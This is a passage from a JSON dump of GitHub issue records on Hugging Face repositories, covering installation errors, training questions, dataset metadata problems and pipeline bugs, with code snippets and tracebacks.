Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:\n    att_mask = ~att_mask.unsqueeze(1) * torch.finfo(xs.dtype).min\n    past_key_values = DynamicCache(self.config.num_hidden_layers)\n\n    for i in torch.arange(self.config.num_hidden_layers):\n        past_key_values.key_cache[i] = key_cache[i].unsqueeze(0)\n        past_key_values.value_cache[i] = value_cache[i].unsqueeze(0)\n    \n    past_seen_tokens =  past_key_values.get_seq_length()\n    cache_position = torch.arange(past_seen_tokens, past_seen_tokens + xs.shape[1], device=xs.device)\n    position_ids = cache_position.unsqueeze(0)\n\n    hidden_states = xs\n    for decoder_layer in self.layers[: self.config.num_hidden_layers]:\n        layer_outputs = decoder_layer(\n            hidden_states,\n            attention_mask=att_mask,\n            position_ids=position_ids,\n            past_key_value=past_key_values,\n            output_attentions=False,\n            use_cache=True,\n            cache_position=cache_position,\n        )\n\n        hidden_states = layer_outputs[0]\n\n    xs = self.norm(hidden_states)\n    new_key_cache = torch.cat(past_key_values.key_cache, dim=0)\n    new_value_cache = torch.cat(past_key_values.value_cache, dim=0)\n\n    return xs, new_key_cache, new_value_cache\n\n```\n\n\n\n\n\n",
    "url": "https://github.com/huggingface/transformers/issues/37408",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-10T04:08:47Z",
    "updated_at": "2025-06-28T08:03:06Z",
    "user": "dearwind153"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 964,
    "title": "RuntimeError: Could not load libtorchcodec during lerobot/scripts/train.py script",
    "body": "### System Info\n\n```Shell\n- `lerobot` version: 0.1.0\n- Platform: Linux-6.8.0-57-generic-x86_64-with-glibc2.35\n- Python version: 3.10.13\n- Huggingface_hub version: 0.29.3\n- Dataset version: 3.4.1\n- Numpy version: 1.26.4\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\n- Cuda version: 12040\n\n\nAdditionally: \n\nffmpeg version : 7.1.1\nTorchCodec version : 0.2.1\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nInstall leRobot from the main documentation as follows : \n\nconda create -n lerobot python=3.10 -y\nconda activate lerobot\ngit clone https://github.com/huggingface/lerobot.git ~/lerobot\npip install --no-binary=av -e\npip install torchvision==0.20.1\nconda install -c conda-forge 'ffmpeg>=7.0' -y\n\n\nAfter collecting a dataset, run `lerobot/scripts/train.py` script \n\n### Expected behavior\n\nHello all! \n\nI am getting started with the lerobot so100 arm and have had a few issues. \n\nThe first was the same as the issue in #883 in running the `control_robot.py` script which I solved (or bypassed) by following [remi cadene's response](https://github.com/huggingface/lerobot/issues/679#issuecomment-2737292192 ) to do `pip install torchvision==0.20.1` and also `conda install -c conda-forge 'ffmpeg>=7.0' -y` after doing `pip install --no-binary=av -e `. This allowed me to successfully run the `control_robot.py` script successfully. However, then I tried to collect a dataset and run a training with the `lerobot/scripts/train.py` script and I encountered the following issue : \n\n```\nfrom torchcodec.decoders._core.video_decoder_ops import (\n  File \"/home/moonshot/miniconda3/envs/lerobot/lib/python3.10/site-packages/torchcodec/decoders/_core/video_decoder_ops.py\", line 59, in \n    load_torchcodec_extension()\n  File \"/home/moonshot/miniconda3/envs/lerobot/lib/python3.10/site-packages/torchcodec/decoders/_core/video_decoder_ops.py\", line 44, in load_torchcodec_extension\n    raise RuntimeError(\nRuntimeError: Could not load libtorchcodec. Likely causes:\n          1. FFmpeg is not properly installed in your environment. We support\n             versions 4, 5, 6 and 7.\n          2. The PyTorch version (2.5.1+cu124) is not compatible with\n             this version of TorchCodec. Refer to the version compatibility\n             table:\n             https://github.com/pytorch/torchcodec?tab=readme-ov-file#installing-torchcodec.\n          3. Another runtime dependency; see exceptions below.\n        The following exceptions were raised as we tried to load libtorchcodec:\n        \n[start of libtorchcodec loading traceback]\n/home/moonshot/miniconda3/envs/lerobot/lib/python3.10/site-packages/torchcodec/libtorchcodec7.so: undefined symbol: _ZNK3c1011StorageImpl27throw_data_ptr_access_errorEv\nlibavutil.so.58: cannot open shared object file: No such file or directory\nlibavutil.so.57: cannot open shared object file: No such file or directory\n/home/moonshot/miniconda3/envs/lerobot/lib/python3.10/site-packages/torchcodec/libtorchcodec4.so: undefined symbol: _ZNK3c1011StorageImpl27throw_data_ptr_access_errorEv\n[end of libtorchcodec loading traceback].\n\n```\n\nIt seems that I have some issues with the `torchcodec`and `ffmpeg` versions not being compatible. 
Checking their versions gives me: \n\n```\nffmpeg version 7.1.1 Copyright (c) 2000-2025 the FFmpeg developers\nbuilt with gcc 13.3.0 (conda-forge gcc 13.3.0-2)\nconfiguration: --prefix=/home/moonshot/miniconda3/envs/lerobot --cc=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/x86_64-conda-linux-gnu-cc --cxx=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/x86_64-conda-linux-gnu-c++ --nm=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/x86_64-conda-linux-gnu-nm --ar=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/x86_64-conda-linux-gnu-ar --disable-doc --enable-openssl --enable-demuxer=dash --enable-hardcoded-tables --enable-libfreetype --enable-libharfbuzz --enable-libfontconfig --enable-libopenh264 --enable-libdav1d --disable-gnutls --enable-libmp3lame --enable-libvpx --enable-libass --enable-pthreads --enable-alsa --enable-libpulse --enable-vaapi --enable-libopenvino --enable-gpl --enable-libx264 --enable-libx265 --enable-libaom --enable-libsvtav1 --enable-libxml2 --enable-pic --enable-shared --disable-static --enable-version3 --enable-zlib --enable-libvorbis --enable-libopus --enable-librsvg --enable-ffplay --pkg-config=/home/conda/feedstock_root/build_artifacts/ffmpeg_1741820412024/_build_env/bin/pkg-config\nlibavutil      59. 39.100 / 59. 39.100\nlibavcodec     61. 19.101 / 61. 19.101\nlibavformat    61.  7.100 / 61.  7.100\nlibavdevice    61.  3.100 / 61.  3.100\nlibavfilter    10.  4.100 / 10.  4.100\nlibswscale      8.  3.100 /  8.  3.100\nlibswresample   5.  3.100 /  5.  3.100\nlibpostproc    58.  3.100 / 58.  3.100\n\n```\n\nAnd `TorchCodec` version  0.2.1. \n\nCould anyone suggest the right v",
    "url": "https://github.com/huggingface/lerobot/issues/964",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-09T14:25:38Z",
    "updated_at": "2025-04-15T13:32:24Z",
    "user": "shrutichakraborty"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37390,
    "title": "how to reduce original model's tokenizer vocabulary",
    "body": "`###` Feature request\n\nI am working on model distillation. I am currently using the nllb-distilled-600M model, but the parameters of this model are still too large, and the vocabulary supports more than 100 languages. My use case is single language translation, such as English to Hebrew. Therefore, I need to reduce the redundant vocabulary of the original model and only keep the English and Hebrew vocabulary. I noticed that transformers do not use the sentencepiece.bpe.model file, and I don't want to retrain a tokenizer, because the trained tokenizer will be inconsistent with the original tokenizer result, which will lead to the subsequent model weight migration and model distillation process cannot be carried out. Therefore, my idea is to quickly replace the tokenizer.json and tokenizer_config.json files in the original model, and then migrate the model weights at the model level to get a pruned model. What I am doing now is to load the original model tokenizer, tokenize the corpus I prepared, count the registered tokens, regain a reduced vocabulary, and change the corresponding json file. Is there any better strategy to quickly replace the tokenizer vocabulary?\n\n![Image](https://github.com/user-attachments/assets/0433f4df-766d-4804-a752-e02a104d3cfa)\n\n### Motivation\n\nquick modify model vocabulary for beater application\n\n### Your contribution\n\n> `def modify_tokenizer():\n\n    for sentences in tqdm.tqdm(range(100,len(en_corpus),100)):\n        enc = teacher_tokenizer(en_corpus[sentences-100:sentences],\n                        add_special_tokens=False,\n                        return_attention_mask=False,\n                        return_token_type_ids=False)\n        for ids in enc['input_ids']:\n            selected_ids.update(ids)\n    print('all english tokens nums is ',len(selected_ids))\n    for sentences in tqdm.tqdm(range(100,len(he_corpus),100)):\n        enc = teacher_tokenizer(he_corpus[sentences-100:sentences],\n                        add_special_tokens=False,\n                        return_attention_mask=False,\n                        return_token_type_ids=False)\n        for ids in enc['input_ids']:\n            selected_ids.update(ids)\n    print('all english+Hebrew tokens nums is ',len(selected_ids))\n    for tok in teacher_tokenizer.all_special_tokens:\n        # print('special_token ',tok)\n        selected_ids.add(teacher_tokenizer.convert_tokens_to_ids(tok))\n    print('all english+Hebrew_special tokens nums is ',len(selected_ids))\n    #  \u4ece\u539f vocab \u4e2d\u53cd\u67e5\u51fa\u5bf9\u5e94 token\n    orig_vocab = teacher_tokenizer.get_vocab()\n    new_tokens = []\n    for tok, idx in sorted(orig_vocab.items(), key=lambda kv: kv[1]):\n        if idx in selected_ids:\n            new_tokens.append(tok)\n    # \u5199\u51fa\u65b0\u7684 vocab.json\uff08Hugging Face \u683c\u5f0f\uff09\n    new_vocab = {tok: i for i, tok in enumerate(new_tokens)}\n    #\u4fee\u6539\u539f\u6709tokenizer\u548ctokenizer_config\n    teacher_tokenizer_path='/workspace/nllb-200-distilled-600M/tokenizer.json'\n    teacher_tokenizer_config_path='/workspace/nllb-200-distilled-600M/tokenizer_config.json'\n    student_tokenizer_path='/workspace/distilled_model_test/tokenizer.json'\n    student_tokenizer_config_path='/workspace/distilled_model_test/tokenizer_config.json'\n    def _read_json(path):\n        with open(path, \"r\", encoding=\"utf-8\") as f:\n            data = json.load(f)\n        return data\n    def _write_json(path,data):\n        with open(path, \"w\", 
encoding=\"utf-8\") as f:\n            json.dump(data, f, ensure_ascii=False, indent=2)\n    #change tokenizer \n    student_tokenizer_data=_read_json(teacher_tokenizer_path)\n    student_tokenizer_data['model']['vocab']=new_vocab\n    for single_added_token in student_tokenizer_data['added_tokens']:\n        single_added_token['id']=new_vocab[single_added_token['content']]\n    new_merges=[]\n    #change merges\n    for merge_pair in student_tokenizer_data['model']['merges']:\n        _temp_merge=merge_pair[0]+merge_pair[1]\n        if _temp_merge in new_vocab.keys():\n            new_merges.append(merge_pair)\n    student_tokenizer_data['model']['merges']=new_merges\n    _write_json(student_tokenizer_path,student_tokenizer_data)\n    #change tokenizer_config`",
    "url": "https://github.com/huggingface/transformers/issues/37390",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-04-09T10:45:56Z",
    "updated_at": "2025-04-09T10:53:07Z",
    "user": "masterwang22327"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7506,
    "title": "HfHubHTTPError: 429 Client Error: Too Many Requests for URL when trying to access Fineweb-10BT on 4A100 GPUs using SLURM",
    "body": "### Describe the bug\n\nI am trying to run some finetunings on 4 A100 GPUs using SLURM using axolotl training framework which in turn uses Huggingface's Trainer and Accelerate on [Fineweb-10BT](https://huggingface.co/datasets/HuggingFaceFW/fineweb), but I end up running into 429 Client Error: Too Many Requests for URL error when I call next(dataloader_iter). Funny is, that I can run some test fine tuning (for just 200 training steps) in 1 A100 GPU using SLURM. Is there any rate limiter set for querying dataset? I could run the fine tuning with the same settings (4 A100 GPUs in SLURM) last month.\n\n### Steps to reproduce the bug\n\nYou would need a server installed with SLURM\n\n1. Create conda environment\n1.1 conda create -n example_env -c conda-forge gxx=11 python=3.10\n1.2 conda activate example_env\n1.3 pip install torch==2.5.1 torchvision==0.20.1 torchaudio==2.5.1 --index-url https://download.pytorch.org/whl/cu124\n1.4 conda install nvidia/label/cuda-12.4.0::cuda-toolkit\n1.5 Download flash_attn-2.7.4.post1+cu12torch2.5cxx11abiFALSE-cp310-cp310-linux_x86_64.whl\n1.6 pip3 install packaging\n1.7 pip3 install ninja\n1.8 pip3 install mlflow\n1.9 Clone https://github.com/calvintanama/axolotl.git\n1.10 `cd` to `axolotl`\n1.11 pip3 install -e '.[deepspeed]'\n\n2. Run the training\n2.1. Create a folder called `config_run` in axolotl directory\n2.2. Copy `config/phi3_pruned_extra_pretrain_22_29_bottleneck_residual_8_a100_4.yaml` to `config_run`\n2.3. Change yaml file in the `config_run` accordingly\n2.4. Change directory and conda environment name in `jobs/train_phi3_22_29_bottleneck_residual_8_a100_4_temp.sh`\n2.5. `jobs/train_phi3_22_29_bottleneck_residual_8_a100_4_temp.sh`\n\n### Expected behavior\n\nThis should not cause any error, but gotten\n\n```\nFile \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/accelerate/data_loader.py\", line 552, in __iter__\n[rank3]:     current_batch = next(dataloader_iter)\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 701, in __next__\n[rank3]:     data = self._next_data()\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 757, in _next_data\n[rank3]:     data = self._dataset_fetcher.fetch(index)  # may raise StopIteration\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 33, in fetch\n[rank3]:     data.append(next(self.dataset_iter))\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/accelerate/data_loader.py\", line 338, in __iter__\n[rank3]:     for element in self.dataset:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 2266, in __iter__\n[rank3]:     for key, example in ex_iterable:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1866, in __iter__\n[rank3]:     for key, example in self.ex_iterable:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", 
line 1084, in __iter__\n[rank3]:     yield from self._iter()\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1263, in _iter\n[rank3]:     for key, transformed_example in outputs:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1258, in \n[rank3]:     outputs = (\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1244, in iter_outputs\n[rank3]:     for i, key_example in inputs_iterator:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1106, in iter_batched_inputs\n[rank3]:     for key, example in iterator:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1866, in __iter__\n[rank3]:     for key, example in self.ex_iterable:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datasets/iterable_dataset.py\", line 1535, in __iter__\n[rank3]:     for x in self.ex_iterable:\n[rank3]:   File \"/home/hk-project-test-p0023745/cd7437/miniconda3/envs/llmpruning_train_temp/lib/python3.10/site-packages/datase",
    "url": "https://github.com/huggingface/datasets/issues/7506",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-09T06:32:04Z",
    "updated_at": "2025-06-29T06:04:59Z",
    "comments": 2,
    "user": "calvintanama"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 960,
    "title": "pi0-fintune-performance",
    "body": "I have been fine-tuning the provided pi0-base model on my dataset using LeRobot. After training for 100,000 steps, I found that the model performs well on tasks that appeared in my dataset, but its performance on unseen tasks is very poor. It seems to lack the generalization ability of a VLA model. Is this phenomenon normal? Are there any strategies to improve this situation?",
    "url": "https://github.com/huggingface/lerobot/issues/960",
    "state": "closed",
    "labels": [
      "question",
      "policies"
    ],
    "created_at": "2025-04-09T01:21:12Z",
    "updated_at": "2025-10-08T08:43:22Z",
    "user": "yanghb1"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 956,
    "title": "pi0 multi gps train",
    "body": "if i have multi 4090, how to modify to train pi0?\n\nonly 1 4090 just error\n![Image](https://github.com/user-attachments/assets/5f1900f2-6d0a-4e05-be99-81587f0bb22d)",
    "url": "https://github.com/huggingface/lerobot/issues/956",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-08T13:06:27Z",
    "updated_at": "2025-11-20T03:07:56Z",
    "user": "ximiluuuu"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37364,
    "title": "How to find a specific func doc when using transformers doc?",
    "body": "### Feature request\n\nBetter UX for doc\n\n### Motivation\n\nThe search and UI layout make it so hard to find a func doc, especially when there are so many func doc in one webpage and your just can not find what you want by web page search.\n\n### Your contribution\n\nno, right now",
    "url": "https://github.com/huggingface/transformers/issues/37364",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-04-08T10:48:04Z",
    "updated_at": "2025-09-15T19:16:35Z",
    "user": "habaohaba"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 586,
    "title": "what is next for this project?",
    "body": "",
    "url": "https://github.com/huggingface/open-r1/issues/586",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-07T21:29:54Z",
    "updated_at": "2025-04-07T21:29:54Z",
    "user": "Mnaik2"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 949,
    "title": "Optional deps in using LeRobot as am optional package",
    "body": "Hi, we are working on enabling LeRobot dataset generation in [IsaacLab](https://github.com/isaac-sim/IsaacLab), such that developers could create data with IsaacLab data generation workflow and use it in their robot learning models.  \n\nThe asks are, \n1. Is there any scheduled release, such that downstream devs could have stable codebase to integrate LeRobot into their applications?\n2. Can we move some deps as optional wrt the core code, if training/eval is not expected? For example, we only need Lerobot dataset related functions, Gymnasium dependency is not needed. You only need Gymnasium dependency if you want to use the environment in eval mode during training or deployment.\n\nI hope those could expand the user base further for LeRobot dataset generation and for training/eval with broader model families.",
    "url": "https://github.com/huggingface/lerobot/issues/949",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "simulation",
      "stale"
    ],
    "created_at": "2025-04-07T16:55:48Z",
    "updated_at": "2025-10-21T02:29:27Z",
    "user": "xyao-nv"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7502,
    "title": "`load_dataset` of size 40GB creates a cache of >720GB",
    "body": "Hi there,\n\nI am trying to load a dataset from the Hugging Face Hub and split it into train and validation splits. Somehow, when I try to do it with `load_dataset`, it exhausts my disk quota. So, I tried manually downloading the parquet files from the hub and loading them as follows:\n\n```python\n ds = DatasetDict(\n        {\n            \"train\": load_dataset(\n                \"parquet\", \n                data_dir=f\"{local_dir}/{tok}\", \n                cache_dir=cache_dir, \n                num_proc=min(12, os.cpu_count()),   # type: ignore\n                split=ReadInstruction(\"train\", from_=0, to=NUM_TRAIN, unit=\"abs\"),  # type: ignore\n            ),\n            \"validation\": load_dataset(\n                \"parquet\", \n                data_dir=f\"{local_dir}/{tok}\", \n                cache_dir=cache_dir, \n                num_proc=min(12, os.cpu_count()),   # type: ignore\n                split=ReadInstruction(\"train\", from_=NUM_TRAIN, unit=\"abs\"),  # type: ignore\n            )\n        }\n    )\n\n```\n\nwhich still strangely creates 720GB of cache. In addition, if I remove the raw parquet file folder (`f\"{local_dir}/{tok}\"` in this example), I am not able to load anything. So, I am left wondering what this cache is doing. Am I missing something? Is there a solution to this problem?\n\nThanks a lot in advance for your help!\n\nA related issue: https://github.com/huggingface/transformers/issues/10204#issue-809007443.\n\n---\n\nPython: 3.11.11\ndatasets: 3.5.0\n",
    "url": "https://github.com/huggingface/datasets/issues/7502",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-07T16:52:34Z",
    "updated_at": "2025-04-15T15:22:12Z",
    "comments": 2,
    "user": "pietrolesci"
  },
  {
    "repo": "huggingface/trl",
    "number": 3254,
    "title": "How to get completion_length?",
    "body": "I noticed that during GRPO training, `completion_length` is recorded. However, I found that it\u2019s not simply obtained by `len(completion)`. How is this calculated\u2014by tokens? Is it possible for me to access the `completion_length` for each sample?\n\n",
    "url": "https://github.com/huggingface/trl/issues/3254",
    "state": "open",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-04-07T15:02:04Z",
    "updated_at": "2025-04-11T03:10:20Z",
    "user": "Tuziking"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11220,
    "title": "Unconditional image generation documentation page not working as expected",
    "body": "### Describe the bug\n\nWhen consulting the documentation for [unconditional image generation](https://huggingface.co/docs/diffusers/using-diffusers/unconditional_image_generation), the last embedded page seems to contain an error that blocks it from being shown (see image below). This is @stevhliu's model stored in [this](https://huggingface.co/spaces/stevhliu/unconditional-image-generation) huggingface space. This space is also down in HuggingFace.\n\n\"Image\"\n\n### Reproduction\n\n- Go to https://huggingface.co/docs/diffusers/using-diffusers/unconditional_image_generation or https://huggingface.co/spaces/stevhliu/unconditional-image-generation, you will see that the unconditional image generation part is not loading\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNot relevant as it is documentation, not system related\n\n### Who can help?\n\n@stevhliu ",
    "url": "https://github.com/huggingface/diffusers/issues/11220",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-07T10:32:45Z",
    "updated_at": "2025-04-08T08:47:18Z",
    "comments": 2,
    "user": "alvaro-mazcu"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1275,
    "title": "How to use @xenova/transformers in a musl-based environment?",
    "body": "### Question\n\nHi,\n\nI encountered the following error when using @xenova/transformers:\n\n```bash\nError: Error loading shared library ld-linux-x86-64.so.2: No such file or directory (needed by /app/node_modules/onnxruntime-node/bin/napi-v3/linux/x64//libonnxruntime.so.1.14.0)\n```\nAfter investigating the issue, I found that it was caused by using the Node Alpine Docker image.\n(https://github.com/huggingface/transformers.js/issues/555)\n(https://github.com/huggingface/transformers.js/issues/376)\nSince Alpine Linux uses musl as its standard C library, and @xenova/transformers depends on onnxruntime-node (which is built against glibc), this incompatibility appears to be the root cause.\n\nI confirmed this by switching to the node:slim image (which uses glibc), and the error was resolved.\n\nHowever, I would really like to use @xenova/transformers in a musl-based environment (e.g., Alpine).\nIs there currently any way to run it on Alpine using musl?\nIf not, are there any plans to support musl or an alternative backend (e.g., onnxruntime-web with WASM) in Node.js?\n\nThanks in advance!",
    "url": "https://github.com/huggingface/transformers.js/issues/1275",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-07T06:34:51Z",
    "updated_at": "2025-10-07T21:23:36Z",
    "user": "ezcolin2"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 583,
    "title": "num_iterations in GRPOConfig does NOT DO what it is supposed to DO",
    "body": "Hi @qgallouedec and @lewtun \n\nThanks again for the amazing work ! I got the chance to try the v0.16.0 trl release in open-r1. \n\nI was excited about num_iterations which was supposed to make the training 6 times faster. Simply one needs something like:\n\n`training_args = GRPOConfig(..., num_iterations=4)\n`\n\nBut I did not see this happening. Using this simple receipe, it takes 58 steps and about 3 hours and 30 minutes to train the model on 8 A100 GPUs with `num_iterations=1`. But increasing it to `num_iterations=4` linearly increases the number of steps to 232 and increases the training time to 4 hours and 20 minutes under the same exact setup. \n\nAm I missing something here ? are we not supposed to re-use the generated data across multiple steps ? then why the training time has increased ? ",
    "url": "https://github.com/huggingface/open-r1/issues/583",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-06T15:57:43Z",
    "updated_at": "2025-04-12T06:00:21Z",
    "user": "ahatamiz"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 412,
    "title": "[QUESTION] - Dummy Agent Library",
    "body": "_---\nDo you see the issue?\n\nThe answer was hallucinated by the model. We need to stop to actually execute the function! Let\u2019s now stop on \u201cObservation\u201d so that we don\u2019t hallucinate the actual function response.\n---_\n\nCan someone explain how the system is hallucinating in this example. I am kind of stuck on this. ",
    "url": "https://github.com/huggingface/agents-course/issues/412",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-06T09:44:14Z",
    "updated_at": "2025-04-06T09:44:14Z",
    "user": "NewTonDBA"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 940,
    "title": "Possible mismatch in observations.state metadata in Libero datasets on Hugging Face",
    "body": "Hello, \n\nI believe there might be a mistake in the Libero datasets hosted on huggingface/datasets.\nSpecifically, the issue is with the `observations.state` column. According to `meta/info.json`, the structure is described as:\n```\n\"observation.state\": {\n    \"dtype\": \"float32\",\n    \"shape\": [\n        8\n    ],\n    \"names\": {\n        \"motors\": [\n            \"x\",\n            \"y\",\n            \"z\",\n            \"rx\",\n            \"ry\",\n            \"rz\",\n            \"rw\",\n            \"gripper\"\n        ]\n    }\n}\n```\n\nHowever, when I check the values in the `observations.state` column, the last two values appear to be negative of each other. It seems like those two values are `robot0_gripper_qpos` from the environment observations. When I compare the values of observations from the environment, the first three values in the column are `robot0_eef_pos` and the second three seems like `robot0_eef_quat` (rx, ry, rz, rw) converted to axis angle representation.\n\nCould you please clarify or confirm whether this is an intended design or a labeling error?\n\nThanks for your work on LeRobot datasets!",
    "url": "https://github.com/huggingface/lerobot/issues/940",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-04-06T04:18:55Z",
    "updated_at": "2025-10-19T02:32:09Z",
    "user": "ozgraslan"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11208,
    "title": "MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline",
    "body": "### Describe the bug\n\nWhen using `StableDiffusion3ControlNetInpaintingPipeline` with `SD3MultiControlNetModel`, I receive an error: \n\n`NotImplementedError: MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline.`\n\n### Reproduction\n\nExample reproduction code:\n\n```python\nimport os\nimport torch\nfrom diffusers.utils import load_image\nfrom diffusers.pipelines import StableDiffusion3ControlNetInpaintingPipeline\nfrom diffusers.models import SD3ControlNetModel, SD3MultiControlNetModel\nfrom diffusers import BitsAndBytesConfig, SD3Transformer2DModel\nfrom transformers import T5EncoderModel\n\n# Load images\nimage = load_image(\n    \"https://huggingface.co/alimama-creative/SD3-Controlnet-Inpainting/resolve/main/images/dog.png\"\n)\nmask = load_image(\n    \"https://huggingface.co/alimama-creative/SD3-Controlnet-Inpainting/resolve/main/images/dog_mask.png\"\n)\n\n# Initialize ControlNet models\ncontrolnetA = SD3ControlNetModel.from_pretrained(\"InstantX/SD3-Controlnet-Pose\")\ncontrolnetB = SD3ControlNetModel.from_pretrained(\"alimama-creative/SD3-Controlnet-Inpainting\", use_safetensors=True, extra_conditioning_channels=1)\ncontrolnet = SD3MultiControlNetModel([controlnetA, controlnetB])\n\n# Load transformer and text encoder\nnf4_config = BitsAndBytesConfig(load_in_4bit=True, bnb_4bit_quant_type=\"nf4\", bnb_4bit_compute_dtype=torch.bfloat16)\nmodel_id = \"stabilityai/stable-diffusion-3.5-large-turbo\"\nmodel_nf4 = SD3Transformer2DModel.from_pretrained(model_id, subfolder=\"transformer\", quantization_config=nf4_config, torch_dtype=torch.bfloat16)\nt5_nf4 = T5EncoderModel.from_pretrained(\"diffusers/t5-nf4\", torch_dtype=torch.bfloat16)\n\n# Initialize pipeline\npipe = StableDiffusion3ControlNetInpaintingPipeline.from_pretrained(\n    \"stabilityai/stable-diffusion-3.5-large-turbo\",\n    token=os.getenv(\"HF_TOKEN\"),\n    controlnet=controlnet,\n    transformer=model_nf4,\n    text_encoder_3=t5_nf4,\n    torch_dtype=torch.bfloat16\n)\n\npipe.enable_model_cpu_offload()\n\n# This fails with NotImplementedError\nresult_image = pipe(\n    prompt=\"a cute dog with a hat\",\n    negative_prompt=\"low quality, bad anatomy\",\n    control_image=[image, image],\n    num_inference_steps=30,\n    guidance_scale=7.5,\n    controlnet_conditioning_scale=[1.0, 1.0],\n    output_type=\"pil\",\n).images[0]\n```\n\n### Logs\n\n```shell\nError\n\n\nNotImplementedError: MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline.\n\n\nError occurs in `diffusers/pipelines/controlnet_sd3/pipeline_stable_diffusion_3_controlnet_inpainting.py` at line 1026. 
*Full error code*:\n\n\n---------------------------------------------------------------------------\nNotImplementedError                       Traceback (most recent call last)\nCell In[1], line 41\n     38 pipe.enable_model_cpu_offload()\n     40 # This fails with NotImplementedError\n---> 41 result_image = pipe(\n     42     prompt=\"a cute dog with a hat\",\n     43     negative_prompt=\"low quality, bad anatomy\",\n     44     control_image=[image, image],\n     45     num_inference_steps=30,\n     46     guidance_scale=7.5,\n     47     controlnet_conditioning_scale=[1.0, 1.0],\n     48     output_type=\"pil\",\n     49 ).images[0]\n\nFile ~/miniconda3/envs/bnb310/lib/python3.10/site-packages/torch/utils/_contextlib.py:115, in context_decorator..decorate_context(*args, **kwargs)\n    112 @functools.wraps(func)\n    113 def decorate_context(*args, **kwargs):\n    114     with ctx_factory():\n--> 115         return func(*args, **kwargs)\n\nFile ~/miniconda3/envs/bnb310/lib/python3.10/site-packages/diffusers/pipelines/controlnet_sd3/pipeline_stable_diffusion_3_controlnet_inpainting.py:1026, in StableDiffusion3ControlNetInpaintingPipeline.__call__(self, prompt, prompt_2, prompt_3, height, width, num_inference_steps, sigmas, guidance_scale, control_guidance_start, control_guidance_end, control_image, control_mask, controlnet_conditioning_scale, controlnet_pooled_projections, negative_prompt, negative_prompt_2, negative_prompt_3, num_images_per_prompt, generator, latents, prompt_embeds, negative_prompt_embeds, pooled_prompt_embeds, negative_pooled_prompt_embeds, 